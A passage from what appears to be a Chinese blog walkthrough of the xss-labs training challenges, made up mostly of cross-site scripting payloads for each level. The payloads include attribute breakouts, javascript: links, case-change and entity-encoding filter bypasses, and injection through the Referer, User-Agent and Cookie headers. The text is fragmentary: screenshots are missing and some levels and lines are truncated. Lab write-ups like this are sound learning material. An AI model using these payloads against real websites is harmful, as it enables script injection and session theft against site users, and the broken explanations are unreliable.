xss

1
在这里插入图片描述
没做任何过滤大白给
2.
在这里插入图片描述
她是个干什么的?百度一下
作用:把预定义的字符转换为 HTML 实体,而不是作为标签运行;如果不用HTMLSpecialChars,就会导致读取时,把"

用这个触发

'οnclick='alert(/xss/)

4.在这里插入图片描述
在这里插入图片描述

过滤了<>,但没转义
闭合input标签中的value

"onclick='alert(/xss/)'

在这里插入图片描述
引用keyword时没有转义

"> <a href='javascript:alert(1)'> 

在这里插入图片描述
没有转化为小写
大小写绕过

"><img Src="1.jpg" Onerror="alert(6666)">

在这里插入图片描述
在这里插入图片描述
可以复写绕过

在这里插入图片描述
编码绕过把t编码 &#116;

javascrip&#116;:alert(1)	

9.和8一样但
在这里插入图片描述
输入中必须包含http://

javascrip&#116;:alert(1)//http://www.2333333.com

在这里插入图片描述
分别对这四个参数进行GET传参:

keyword=test&t_link=test1&t_history=test2&t_sort=test3

三个隐藏的input参数:t_link、t_history、t_sort
t_sort被写入到html页面且过滤了尖括号,并没有进行编码
双引号闭合input标签中对value

?t_sort="type="text" οnmοuseοver="alert(1)

在这里插入图片描述
抓包修改Referer字段

php Referer: "οnmοuseοver="alert(/xss/)

12
在这里插入图片描述
抓包修改user-agent字段

User-Agent: "οnmοuseοver="alert(/xss/)

在这里插入图片描述
改cookie

Cookie: user="οnmοuseοver="alert(/xss/)

在这里插入图片描述
我tm直接疑惑
15.
在这里插入图片描述15.
利用ng-include指令的特性包含一个有漏洞的html文件
在这里插入图片描述

src='http://127.0.0.1/xss-labs-master/level1.php?name="><a href="javascript:alert(/xss/)">xss'

16。
在这里插入图片描述

将%0a或者%0D当成空格使用

?keyword=<a%0Ahref='javas%0Acript:alert("xss")'>xss

在这里插入图片描述

embed标签定义嵌入的内容,并且做了尖括号过滤,加入一个属性进去

arg01= onmousemove&arg02=javascript:alert(/xss/)

18.和17一样
19.rg01=version&arg02=<a href='javascript:alert(/xss/)'>xss</a>
2.????

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值